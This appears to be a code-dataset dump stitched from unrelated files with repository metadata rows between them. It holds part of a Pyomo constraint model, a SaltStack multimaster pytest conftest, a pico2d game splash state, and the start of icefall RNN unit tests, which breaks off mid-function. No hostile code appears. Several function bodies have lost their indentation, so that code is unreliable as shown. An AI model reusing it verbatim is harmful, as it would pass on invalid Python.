m.c212 = Constraint(expr= - m.x534 - m.x535 - m.x536 - m.x537 - m.x538 - m.x539 - m.x540 - m.x541 - m.x542 - m.x543
- m.x544 - m.x545 - m.x546 + m.x673 >= 0)
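# Editor's note (inferred from structure): c213-c254 below couple each
# aggregate m.x632..m.x673 with a binary m.b547..m.b588 and a companion
# variable m.x589..m.x630 through bilinear terms, while c256-c297 are big-M
# style rows that force each 13-variable block to zero when its binary is off.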
m.c213 = Constraint(expr=166*m.x632*m.b547 - 166*m.b547*m.x589 + m.x632*m.x589 <= 0)
m.c214 = Constraint(expr=463*m.x633*m.b548 - 463*m.b548*m.x590 + m.x633*m.x590 <= 0)
m.c215 = Constraint(expr=522*m.x634*m.b549 - 522*m.b549*m.x591 + m.x634*m.x591 <= 0)
m.c216 = Constraint(expr=141*m.x635*m.b550 - 141*m.b550*m.x592 + m.x635*m.x592 <= 0)
m.c217 = Constraint(expr=166*m.x636*m.b551 - 166*m.b551*m.x593 + m.x636*m.x593 <= 0)
m.c218 = Constraint(expr=265*m.x637*m.b552 - 265*m.b552*m.x594 + m.x637*m.x594 <= 0)
m.c219 = Constraint(expr=463*m.x638*m.b553 - 463*m.b553*m.x595 + m.x638*m.x595 <= 0)
m.c220 = Constraint(expr=456*m.x639*m.b554 - 456*m.b554*m.x596 + m.x639*m.x596 <= 0)
m.c221 = Constraint(expr=526*m.x640*m.b555 - 526*m.b555*m.x597 + m.x640*m.x597 <= 0)
m.c222 = Constraint(expr=152*m.x641*m.b556 - 152*m.b556*m.x598 + m.x641*m.x598 <= 0)
m.c223 = Constraint(expr=456*m.x642*m.b557 - 456*m.b557*m.x599 + m.x642*m.x599 <= 0)
m.c224 = Constraint(expr=384*m.x643*m.b558 - 384*m.b558*m.x600 + m.x643*m.x600 <= 0)
m.c225 = Constraint(expr=441*m.x644*m.b559 - 441*m.b559*m.x601 + m.x644*m.x601 <= 0)
m.c226 = Constraint(expr=309*m.x645*m.b560 - 309*m.b560*m.x602 + m.x645*m.x602 <= 0)
m.c227 = Constraint(expr=233*m.x646*m.b561 - 233*m.b561*m.x603 + m.x646*m.x603 <= 0)
m.c228 = Constraint(expr=526*m.x647*m.b562 - 526*m.b562*m.x604 + m.x647*m.x604 <= 0)
m.c229 = Constraint(expr=384*m.x648*m.b563 - 384*m.b563*m.x605 + m.x648*m.x605 <= 0)
m.c230 = Constraint(expr=203*m.x649*m.b564 - 203*m.b564*m.x606 + m.x649*m.x606 <= 0)
m.c231 = Constraint(expr=522*m.x650*m.b565 - 522*m.b565*m.x607 + m.x650*m.x607 <= 0)
m.c232 = Constraint(expr=265*m.x651*m.b566 - 265*m.b566*m.x608 + m.x651*m.x608 <= 0)
m.c233 = Constraint(expr=152*m.x652*m.b567 - 152*m.b567*m.x609 + m.x652*m.x609 <= 0)
m.c234 = Constraint(expr=441*m.x653*m.b568 - 441*m.b568*m.x610 + m.x653*m.x610 <= 0)
m.c235 = Constraint(expr=203*m.x654*m.b569 - 203*m.b569*m.x611 + m.x654*m.x611 <= 0)
m.c236 = Constraint(expr=284*m.x655*m.b570 - 284*m.b570*m.x612 + m.x655*m.x612 <= 0)
m.c237 = Constraint(expr=426*m.x656*m.b571 - 426*m.b571*m.x613 + m.x656*m.x613 <= 0)
m.c238 = Constraint(expr=284*m.x657*m.b572 - 284*m.b572*m.x614 + m.x657*m.x614 <= 0)
m.c239 = Constraint(expr=109*m.x658*m.b573 - 109*m.b573*m.x615 + m.x658*m.x615 <= 0)
m.c240 = Constraint(expr=309*m.x659*m.b574 - 309*m.b574*m.x616 + m.x659*m.x616 <= 0)
m.c241 = Constraint(expr=434*m.x660*m.b575 - 434*m.b575*m.x617 + m.x660*m.x617 <= 0)
m.c242 = Constraint(expr=141*m.x661*m.b576 - 141*m.b576*m.x618 + m.x661*m.x618 <= 0)
m.c243 = Constraint(expr=434*m.x662*m.b577 - 434*m.b577*m.x619 + m.x662*m.x619 <= 0)
m.c244 = Constraint(expr=403*m.x663*m.b578 - 403*m.b578*m.x620 + m.x663*m.x620 <= 0)
m.c245 = Constraint(expr=426*m.x664*m.b579 - 426*m.b579*m.x621 + m.x664*m.x621 <= 0)
m.c246 = Constraint(expr=403*m.x665*m.b580 - 403*m.b580*m.x622 + m.x665*m.x622 <= 0)
m.c247 = Constraint(expr=151*m.x666*m.b581 - 151*m.b581*m.x623 + m.x666*m.x623 <= 0)
m.c248 = Constraint(expr=233*m.x667*m.b582 - 233*m.b582*m.x624 + m.x667*m.x624 <= 0)
m.c249 = Constraint(expr=109*m.x668*m.b583 - 109*m.b583*m.x625 + m.x668*m.x625 <= 0)
m.c250 = Constraint(expr=367*m.x669*m.b584 - 367*m.b584*m.x626 + m.x669*m.x626 <= 0)
m.c251 = Constraint(expr=367*m.x670*m.b585 - 367*m.b585*m.x627 + m.x670*m.x627 <= 0)
m.c252 = Constraint(expr=382*m.x671*m.b586 - 382*m.b586*m.x628 + m.x671*m.x628 <= 0)
m.c253 = Constraint(expr=151*m.x672*m.b587 - 151*m.b587*m.x629 + m.x672*m.x629 <= 0)
m.c254 = Constraint(expr=382*m.x673*m.b588 - 382*m.b588*m.x630 + m.x673*m.x630 <= 0)
m.c255 = Constraint(expr= m.x589 + m.x590 + m.x591 + m.x592 + m.x593 + m.x594 + m.x595 + m.x596 + m.x597 + m.x598
+ m.x599 + m.x600 + m.x601 + m.x602 + m.x603 + m.x604 + m.x605 + m.x606 + m.x607 + m.x608
+ m.x609 + m.x610 + m.x611 + m.x612 + m.x613 + m.x614 + m.x615 + m.x616 + m.x617 + m.x618
+ m.x619 + m.x620 + m.x621 + m.x622 + m.x623 + m.x624 + m.x625 + m.x626 + m.x627 + m.x628
+ m.x629 + m.x630 <= 18536)
m.c256 = Constraint(expr= m.x1 + m.x2 + m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 + m.x12 + m.x13
- 166*m.b547 <= 0)
m.c257 = Constraint(expr= m.x14 + m.x15 + m.x16 + m.x17 + m.x18 + m.x19 + m.x20 + m.x21 + m.x22 + m.x23 + m.x24
+ m.x25 + m.x26 - 463*m.b548 <= 0)
m.c258 = Constraint(expr= m.x27 + m.x28 + m.x29 + m.x30 + m.x31 + m.x32 + m.x33 + m.x34 + m.x35 + m.x36 + m.x37
+ m.x38 + m.x39 - 522*m.b549 <= 0)
m.c259 = Constraint(expr= m.x40 + m.x41 + m.x42 + m.x43 + m.x44 + m.x45 + m.x46 + m.x47 + m.x48 + m.x49 + m.x50
+ m.x51 + m.x52 - 141*m.b550 <= 0)
m.c260 = Constraint(expr= m.x53 + m.x54 + m.x55 + m.x56 + m.x57 + m.x58 + m.x59 + m.x60 + m.x61 + m.x62 + m.x63
+ m.x64 + m.x65 - 166*m.b551 <= 0)
m.c261 = Constraint(expr= m.x66 + m.x67 + m.x68 + m.x69 + m.x70 + m.x71 + m.x72 + m.x73 + m.x74 + m.x75 + m.x76
+ m.x77 + m.x78 - 265*m.b552 <= 0)
m.c262 = Constraint(expr= m.x79 + m.x80 + m.x81 + m.x82 + m.x83 + m.x84 + m.x85 + m.x86 + m.x87 + m.x88 + m.x89
+ m.x90 + m.x91 - 463*m.b553 <= 0)
m.c263 = Constraint(expr= m.x92 + m.x93 + m.x94 + m.x95 + m.x96 + m.x97 + m.x98 + m.x99 + m.x100 + m.x101 + m.x102
+ m.x103 + m.x104 - 456*m.b554 <= 0)
m.c264 = Constraint(expr= m.x105 + m.x106 + m.x107 + m.x108 + m.x109 + m.x110 + m.x111 + m.x112 + m.x113 + m.x114
+ m.x115 + m.x116 + m.x117 - 526*m.b555 <= 0)
m.c265 = Constraint(expr= m.x118 + m.x119 + m.x120 + m.x121 + m.x122 + m.x123 + m.x124 + m.x125 + m.x126 + m.x127
+ m.x128 + m.x129 + m.x130 - 152*m.b556 <= 0)
m.c266 = Constraint(expr= m.x131 + m.x132 + m.x133 + m.x134 + m.x135 + m.x136 + m.x137 + m.x138 + m.x139 + m.x140
+ m.x141 + m.x142 + m.x143 - 456*m.b557 <= 0)
m.c267 = Constraint(expr= m.x144 + m.x145 + m.x146 + m.x147 + m.x148 + m.x149 + m.x150 + m.x151 + m.x152 + m.x153
+ m.x154 + m.x155 + m.x156 - 384*m.b558 <= 0)
m.c268 = Constraint(expr= m.x157 + m.x158 + m.x159 + m.x160 + m.x161 + m.x162 + m.x163 + m.x164 + m.x165 + m.x166
+ m.x167 + m.x168 + m.x169 - 441*m.b559 <= 0)
m.c269 = Constraint(expr= m.x170 + m.x171 + m.x172 + m.x173 + m.x174 + m.x175 + m.x176 + m.x177 + m.x178 + m.x179
+ m.x180 + m.x181 + m.x182 - 309*m.b560 <= 0)
m.c270 = Constraint(expr= m.x183 + m.x184 + m.x185 + m.x186 + m.x187 + m.x188 + m.x189 + m.x190 + m.x191 + m.x192
+ m.x193 + m.x194 + m.x195 - 233*m.b561 <= 0)
m.c271 = Constraint(expr= m.x196 + m.x197 + m.x198 + m.x199 + m.x200 + m.x201 + m.x202 + m.x203 + m.x204 + m.x205
+ m.x206 + m.x207 + m.x208 - 526*m.b562 <= 0)
m.c272 = Constraint(expr= m.x209 + m.x210 + m.x211 + m.x212 + m.x213 + m.x214 + m.x215 + m.x216 + m.x217 + m.x218
+ m.x219 + m.x220 + m.x221 - 384*m.b563 <= 0)
m.c273 = Constraint(expr= m.x222 + m.x223 + m.x224 + m.x225 + m.x226 + m.x227 + m.x228 + m.x229 + m.x230 + m.x231
+ m.x232 + m.x233 + m.x234 - 203*m.b564 <= 0)
m.c274 = Constraint(expr= m.x235 + m.x236 + m.x237 + m.x238 + m.x239 + m.x240 + m.x241 + m.x242 + m.x243 + m.x244
+ m.x245 + m.x246 + m.x247 - 522*m.b565 <= 0)
m.c275 = Constraint(expr= m.x248 + m.x249 + m.x250 + m.x251 + m.x252 + m.x253 + m.x254 + m.x255 + m.x256 + m.x257
+ m.x258 + m.x259 + m.x260 - 265*m.b566 <= 0)
m.c276 = Constraint(expr= m.x261 + m.x262 + m.x263 + m.x264 + m.x265 + m.x266 + m.x267 + m.x268 + m.x269 + m.x270
+ m.x271 + m.x272 + m.x273 - 152*m.b567 <= 0)
m.c277 = Constraint(expr= m.x274 + m.x275 + m.x276 + m.x277 + m.x278 + m.x279 + m.x280 + m.x281 + m.x282 + m.x283
+ m.x284 + m.x285 + m.x286 - 441*m.b568 <= 0)
m.c278 = Constraint(expr= m.x287 + m.x288 + m.x289 + m.x290 + m.x291 + m.x292 + m.x293 + m.x294 + m.x295 + m.x296
+ m.x297 + m.x298 + m.x299 - 203*m.b569 <= 0)
m.c279 = Constraint(expr= m.x300 + m.x301 + m.x302 + m.x303 + m.x304 + m.x305 + m.x306 + m.x307 + m.x308 + m.x309
+ m.x310 + m.x311 + m.x312 - 284*m.b570 <= 0)
m.c280 = Constraint(expr= m.x313 + m.x314 + m.x315 + m.x316 + m.x317 + m.x318 + m.x319 + m.x320 + m.x321 + m.x322
+ m.x323 + m.x324 + m.x325 - 426*m.b571 <= 0)
m.c281 = Constraint(expr= m.x326 + m.x327 + m.x328 + m.x329 + m.x330 + m.x331 + m.x332 + m.x333 + m.x334 + m.x335
+ m.x336 + m.x337 + m.x338 - 284*m.b572 <= 0)
m.c282 = Constraint(expr= m.x339 + m.x340 + m.x341 + m.x342 + m.x343 + m.x344 + m.x345 + m.x346 + m.x347 + m.x348
+ m.x349 + m.x350 + m.x351 - 109*m.b573 <= 0)
m.c283 = Constraint(expr= m.x352 + m.x353 + m.x354 + m.x355 + m.x356 + m.x357 + m.x358 + m.x359 + m.x360 + m.x361
+ m.x362 + m.x363 + m.x364 - 309*m.b574 <= 0)
m.c284 = Constraint(expr= m.x365 + m.x366 + m.x367 + m.x368 + m.x369 + m.x370 + m.x371 + m.x372 + m.x373 + m.x374
+ m.x375 + m.x376 + m.x377 - 434*m.b575 <= 0)
m.c285 = Constraint(expr= m.x378 + m.x379 + m.x380 + m.x381 + m.x382 + m.x383 + m.x384 + m.x385 + m.x386 + m.x387
+ m.x388 + m.x389 + m.x390 - 141*m.b576 <= 0)
m.c286 = Constraint(expr= m.x391 + m.x392 + m.x393 + m.x394 + m.x395 + m.x396 + m.x397 + m.x398 + m.x399 + m.x400
+ m.x401 + m.x402 + m.x403 - 434*m.b577 <= 0)
m.c287 = Constraint(expr= m.x404 + m.x405 + m.x406 + m.x407 + m.x408 + m.x409 + m.x410 + m.x411 + m.x412 + m.x413
+ m.x414 + m.x415 + m.x416 - 403*m.b578 <= 0)
m.c288 = Constraint(expr= m.x417 + m.x418 + m.x419 + m.x420 + m.x421 + m.x422 + m.x423 + m.x424 + m.x425 + m.x426
+ m.x427 + m.x428 + m.x429 - 426*m.b579 <= 0)
m.c289 = Constraint(expr= m.x430 + m.x431 + m.x432 + m.x433 + m.x434 + m.x435 + m.x436 + m.x437 + m.x438 + m.x439
+ m.x440 + m.x441 + m.x442 - 403*m.b580 <= 0)
m.c290 = Constraint(expr= m.x443 + m.x444 + m.x445 + m.x446 + m.x447 + m.x448 + m.x449 + m.x450 + m.x451 + m.x452
+ m.x453 + m.x454 + m.x455 - 151*m.b581 <= 0)
m.c291 = Constraint(expr= m.x456 + m.x457 + m.x458 + m.x459 + m.x460 + m.x461 + m.x462 + m.x463 + m.x464 + m.x465
+ m.x466 + m.x467 + m.x468 - 233*m.b582 <= 0)
m.c292 = Constraint(expr= m.x469 + m.x470 + m.x471 + m.x472 + m.x473 + m.x474 + m.x475 + m.x476 + m.x477 + m.x478
+ m.x479 + m.x480 + m.x481 - 109*m.b583 <= 0)
m.c293 = Constraint(expr= m.x482 + m.x483 + m.x484 + m.x485 + m.x486 + m.x487 + m.x488 + m.x489 + m.x490 + m.x491
+ m.x492 + m.x493 + m.x494 - 367*m.b584 <= 0)
m.c294 = Constraint(expr= m.x495 + m.x496 + m.x497 + m.x498 + m.x499 + m.x500 + m.x501 + m.x502 + m.x503 + m.x504
+ m.x505 + m.x506 + m.x507 - 367*m.b585 <= 0)
m.c295 = Constraint(expr= m.x508 + m.x509 + m.x510 + m.x511 + m.x512 + m.x513 + m.x514 + m.x515 + m.x516 + m.x517
+ m.x518 + m.x519 + m.x520 - 382*m.b586 <= 0)
m.c296 = Constraint(expr= m.x521 + m.x522 + m.x523 + m.x524 + m.x525 + m.x526 + m.x527 + m.x528 + m.x529 + m.x530
+ m.x531 + m.x532 + m.x533 - 151*m.b587 <= 0)
m.c297 = Constraint(expr= m.x534 + m.x535 + m.x536 + m.x537 + m.x538 + m.x539 + m.x540 + m.x541 + m.x542 + m.x543
+ m.x544 + m.x545 + m.x546 - 382*m.b588 <= 0)
| 53.085288 | 120 | 0.629634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 699 | 0.009359 |
c7d378679d5e763e0a3427a5a59048ba70934d41 | 4,322 | py | Python | tests/pytests/scenarios/multimaster/conftest.py | lllamnyp/salt | de112e5b362191e3708e170b7eb8e990787ad412 | [
"Apache-2.0"
]
| null | null | null | tests/pytests/scenarios/multimaster/conftest.py | lllamnyp/salt | de112e5b362191e3708e170b7eb8e990787ad412 | [
"Apache-2.0"
]
| null | null | null | tests/pytests/scenarios/multimaster/conftest.py | lllamnyp/salt | de112e5b362191e3708e170b7eb8e990787ad412 | [
"Apache-2.0"
]
| null | null | null | import logging
import os
import shutil
import subprocess
import pytest
import salt.utils.platform
log = logging.getLogger(__name__)
@pytest.fixture(scope="package", autouse=True)
def skip_on_tcp_transport(request):
if request.config.getoption("--transport") == "tcp":
        pytest.skip("Multimaster under the TCP transport is not working. See #59053")
@pytest.fixture(scope="package")
def salt_mm_master_1(request, salt_factories):
config_defaults = {
"open_mode": True,
"transport": request.config.getoption("--transport"),
}
config_overrides = {
"interface": "127.0.0.1",
}
factory = salt_factories.salt_master_daemon(
"mm-master-1",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
with factory.started(start_timeout=120):
yield factory
@pytest.fixture(scope="package")
def mm_master_1_salt_cli(salt_mm_master_1):
return salt_mm_master_1.get_salt_cli(timeout=120)
@pytest.fixture(scope="package")
def salt_mm_master_2(salt_factories, salt_mm_master_1):
if salt.utils.platform.is_darwin() or salt.utils.platform.is_freebsd():
subprocess.check_output(["ifconfig", "lo0", "alias", "127.0.0.2", "up"])
config_defaults = {
"open_mode": True,
"transport": salt_mm_master_1.config["transport"],
}
config_overrides = {
"interface": "127.0.0.2",
}
# Use the same ports for both masters, they are binding to different interfaces
for key in (
"ret_port",
"publish_port",
):
config_overrides[key] = salt_mm_master_1.config[key]
factory = salt_factories.salt_master_daemon(
"mm-master-2",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
    # The secondary salt master depends on the primary salt master fixture
    # because we need to clone the keys
for keyfile in ("master.pem", "master.pub"):
shutil.copyfile(
os.path.join(salt_mm_master_1.config["pki_dir"], keyfile),
os.path.join(factory.config["pki_dir"], keyfile),
)
with factory.started(start_timeout=120):
yield factory
@pytest.fixture(scope="package")
def mm_master_2_salt_cli(salt_mm_master_2):
return salt_mm_master_2.get_salt_cli(timeout=120)
@pytest.fixture(scope="package")
def salt_mm_minion_1(salt_mm_master_1, salt_mm_master_2):
config_defaults = {
"transport": salt_mm_master_1.config["transport"],
}
mm_master_1_port = salt_mm_master_1.config["ret_port"]
mm_master_1_addr = salt_mm_master_1.config["interface"]
mm_master_2_port = salt_mm_master_2.config["ret_port"]
mm_master_2_addr = salt_mm_master_2.config["interface"]
config_overrides = {
"master": [
"{}:{}".format(mm_master_1_addr, mm_master_1_port),
"{}:{}".format(mm_master_2_addr, mm_master_2_port),
],
"test.foo": "baz",
}
factory = salt_mm_master_1.salt_minion_daemon(
"mm-minion-1",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
with factory.started(start_timeout=120):
yield factory
@pytest.fixture(scope="package")
def salt_mm_minion_2(salt_mm_master_1, salt_mm_master_2):
config_defaults = {
"transport": salt_mm_master_1.config["transport"],
}
mm_master_1_port = salt_mm_master_1.config["ret_port"]
mm_master_1_addr = salt_mm_master_1.config["interface"]
mm_master_2_port = salt_mm_master_2.config["ret_port"]
mm_master_2_addr = salt_mm_master_2.config["interface"]
config_overrides = {
"master": [
"{}:{}".format(mm_master_1_addr, mm_master_1_port),
"{}:{}".format(mm_master_2_addr, mm_master_2_port),
],
"test.foo": "baz",
}
factory = salt_mm_master_2.salt_minion_daemon(
"mm-minion-2",
defaults=config_defaults,
overrides=config_overrides,
extra_cli_arguments_after_first_start_failure=["--log-level=debug"],
)
with factory.started(start_timeout=120):
yield factory
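

# Hypothetical usage sketch (editor's addition, not part of the original Salt
# test suite): a test module in this package would request the fixtures by
# name, e.g.
#
#     def test_minion_sees_both_masters(salt_mm_minion_1, mm_master_1_salt_cli):
#         ret = mm_master_1_salt_cli.run("test.ping", minion_tgt=salt_mm_minion_1.id)
#         assert ret.data is True
#
# The exact attribute holding the parsed return value (``ret.data`` here)
# depends on the pytest-salt-factories version in use.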
| 31.547445 | 85 | 0.679084 | 0 | 0 | 3,550 | 0.821379 | 4,167 | 0.964137 | 0 | 0 | 876 | 0.202684 |
c7d37af76275d31df153580818ea0db96b86762e | 1,210 | py | Python | supermario/supermario 1117/start_state.py | Kimmiryeong/2DGP_GameProject | ad3fb197aab27227fc92fd404b2c310f8d0827ca | [
"MIT"
]
| null | null | null | supermario/supermario 1117/start_state.py | Kimmiryeong/2DGP_GameProject | ad3fb197aab27227fc92fd404b2c310f8d0827ca | [
"MIT"
]
| null | null | null | supermario/supermario 1117/start_state.py | Kimmiryeong/2DGP_GameProject | ad3fb197aab27227fc92fd404b2c310f8d0827ca | [
"MIT"
]
| null | null | null | import game_framework
from pico2d import *
import title_state
name = "StartState"
image = None
logo_time = 0.0
def enter():
global image
image = load_image('kpu_credit.png')
def exit():
global image
del(image)
def update():
global logo_time
if (logo_time > 1.0):
logo_time = 0.8
game_framework.change_state(title_state)
delay(0.01)
    logo_time += 0.05
def draw():
global image
clear_canvas()
image.draw(400,300)
update_canvas()
def handle_events():
events = get_events()
pass
def pause(): pass
def resume(): pass
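# Editor's note: enter/exit/update/draw/handle_events/pause/resume appear to be
# the state-module interface that game_framework.change_state() drives; this
# splash state shows the credit image until logo_time passes 1.0 (about 20
# updates at +0.05 each) and then hands control to title_state.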
| 11.747573 | 48 | 0.634711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.046281 |
c7d524f7dbf8736dbbb40f3bb15a61c60aba8191 | 22,620 | py | Python | egs/librispeech/ASR/transducer/test_rnn.py | rosrad/icefall | 6f282731286a6855658c6882c3c938437448e05e | [
"Apache-2.0"
]
| null | null | null | egs/librispeech/ASR/transducer/test_rnn.py | rosrad/icefall | 6f282731286a6855658c6882c3c938437448e05e | [
"Apache-2.0"
]
| null | null | null | egs/librispeech/ASR/transducer/test_rnn.py | rosrad/icefall | 6f282731286a6855658c6882c3c938437448e05e | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# Copyright 2021 Xiaomi Corp. (authors: Fangjun Kuang)
#
# See ../../../../LICENSE for clarification regarding multiple authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
from transducer.rnn import (
LayerNormGRU,
LayerNormGRUCell,
LayerNormGRULayer,
LayerNormLSTM,
LayerNormLSTMCell,
LayerNormLSTMLayer,
)
def get_devices():
devices = [torch.device("cpu")]
if torch.cuda.is_available():
devices.append(torch.device("cuda", 0))
return devices
def assert_allclose(a: torch.Tensor, b: torch.Tensor, atol=1e-6, **kwargs):
assert torch.allclose(
a, b, atol=atol, **kwargs
), f"{(a - b).abs().max()}, {a.numel()}"
def test_layernorm_lstm_cell_jit(device="cpu"):
input_size = 10
hidden_size = 20
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
cell = LayerNormLSTMCell(
input_size=input_size,
hidden_size=hidden_size,
bias=bias,
device=device,
)
torch.jit.script(cell)
def test_layernorm_lstm_cell_constructor(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
ln=nn.Identity,
device=device,
)
torch_cell = nn.LSTMCell(
input_size,
hidden_size,
).to(device)
for name, param in self_cell.named_parameters():
assert param.shape == getattr(torch_cell, name).shape
assert len(self_cell.state_dict()) == len(torch_cell.state_dict())
def test_layernorm_lstm_cell_with_projection_jit(device="cpu"):
input_size = 10
hidden_size = 20
proj_size = 5
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
proj_size=proj_size,
device=device,
)
torch.jit.script(self_cell)
def test_layernorm_lstm_cell_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
torch_cell = nn.LSTMCell(
input_size,
hidden_size,
bias=bias,
).to(device)
with torch.no_grad():
for name, torch_param in torch_cell.named_parameters():
self_param = getattr(self_cell, name)
torch_param.copy_(self_param)
N = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_h, self_c = self_cell(x.clone(), (h, c))
torch_h, torch_c = torch_cell(x_clone, (h, c))
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
self_hc = self_h * self_c
torch_hc = torch_h * torch_c
(
self_hc.reshape(-1) * torch.arange(self_hc.numel(), device=device)
).sum().backward()
(
torch_hc.reshape(-1) * torch.arange(torch_hc.numel(), device=device)
).sum().backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-3)
def test_layernorm_lstm_cell_with_projection_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=10, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
proj_size = torch.randint(low=2, high=hidden_size, size=(1,)).item()
self_cell = LayerNormLSTMCell(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
proj_size=proj_size,
device=device,
)
torch_cell = nn.LSTM(
input_size,
hidden_size,
bias=bias,
proj_size=proj_size,
batch_first=True,
).to(device)
with torch.no_grad():
for name, self_param in self_cell.named_parameters():
getattr(torch_cell, f"{name}_l0").copy_(self_param)
N = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, input_size, device=device).requires_grad_()
h = torch.rand(N, proj_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_h, self_c = self_cell(x.clone(), (h, c))
_, (torch_h, torch_c) = torch_cell(
x_clone.unsqueeze(1), (h.unsqueeze(0), c.unsqueeze(0))
)
torch_h = torch_h.squeeze(0)
torch_c = torch_c.squeeze(0)
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
(self_h.sum() * self_c.sum()).backward()
(torch_h.sum() * torch_c.sum()).backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-5)
def test_layernorm_lstm_layer_jit(device="cpu"):
input_size = 10
hidden_size = 20
layer = LayerNormLSTMLayer(
input_size,
hidden_size=hidden_size,
device=device,
)
torch.jit.script(layer)
def test_layernorm_lstm_layer_with_project_jit(device="cpu"):
input_size = 10
hidden_size = 20
proj_size = 5
layer = LayerNormLSTMLayer(
input_size,
hidden_size=hidden_size,
proj_size=proj_size,
device=device,
)
torch.jit.script(layer)
def test_layernorm_lstm_layer_with_projection_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=10, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
proj_size = torch.randint(low=2, high=hidden_size, size=(1,)).item()
self_layer = LayerNormLSTMLayer(
input_size,
hidden_size,
bias=bias,
proj_size=proj_size,
ln=nn.Identity,
device=device,
)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
h = torch.rand(N, proj_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_y, (self_h, self_c) = self_layer(x, (h, c))
torch_layer = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=1,
bias=bias,
proj_size=proj_size,
batch_first=True,
dropout=0,
bidirectional=False,
).to(device)
with torch.no_grad():
for name, self_param in self_layer.cell.named_parameters():
getattr(torch_layer, f"{name}_l0").copy_(self_param)
torch_y, (torch_h, torch_c) = torch_layer(
x_clone, (h.unsqueeze(0), c.unsqueeze(0))
)
assert_allclose(self_y, torch_y)
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
self_y.sum().backward()
torch_y.sum().backward()
assert_allclose(x.grad, x_clone.grad, atol=1e-5)
def test_layernorm_lstm_layer_forward(device="cpu"):
input_size = torch.randint(low=2, high=100, size=(1,)).item()
hidden_size = torch.randint(low=2, high=100, size=(1,)).item()
bias = torch.randint(low=0, high=1000, size=(1,)).item() & 2 == 0
self_layer = LayerNormLSTMLayer(
input_size,
hidden_size,
bias=bias,
ln=nn.Identity,
device=device,
)
N = torch.randint(low=2, high=100, size=(1,))
T = torch.randint(low=2, high=100, size=(1,))
x = torch.rand(N, T, input_size, device=device).requires_grad_()
h = torch.rand(N, hidden_size, device=device)
c = torch.rand(N, hidden_size, device=device)
x_clone = x.detach().clone().requires_grad_()
self_y, (self_h, self_c) = self_layer(x, (h, c))
torch_layer = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=1,
bias=bias,
batch_first=True,
dropout=0,
bidirectional=False,
).to(device)
with torch.no_grad():
for name, self_param in self_layer.cell.named_parameters():
getattr(torch_layer, f"{name}_l0").copy_(self_param)
torch_y, (torch_h, torch_c) = torch_layer(
x_clone, (h.unsqueeze(0), c.unsqueeze(0))
)
assert_allclose(self_y, torch_y)
assert_allclose(self_h, torch_h)
assert_allclose(self_c, torch_c)
self_hc = self_h * self_c
torch_hc = torch_h * torch_c
self_hc_sum = (
self_hc.reshape(-1) * torch.arange(self_hc.numel(), device=device)
).sum()
torch_hc_sum = (
torch_hc.reshape(-1) * torch.arange(torch_hc.numel(), device=device)
).sum()
self_y_sum = (
self_y.reshape(-1) * torch.arange(self_y.numel(), device=device)
).sum()
torch_y_sum = (
torch_y.reshape(-1) * torch.arange(torch_y.numel(), device=device)
).sum()
(self_hc_sum + self_y_sum).backward()
(torch_hc_sum + torch_y_sum).backward()
assert_allclose(x.grad, x_clone.grad, atol=0.1)
def test_layernorm_lstm_jit(device="cpu"):
input_size = 2
hidden_size = 3
num_layers = 4
bias = True
lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
ln=nn.Identity,
device=device,
)
torch.jit.script(lstm)
def test_layernorm_lstm_with_projection_jit(device="cpu"):
input_size = 2
hidden_size = 5
proj_size = 3
num_layers = 4
bias = True
lstm = LayerNormLSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
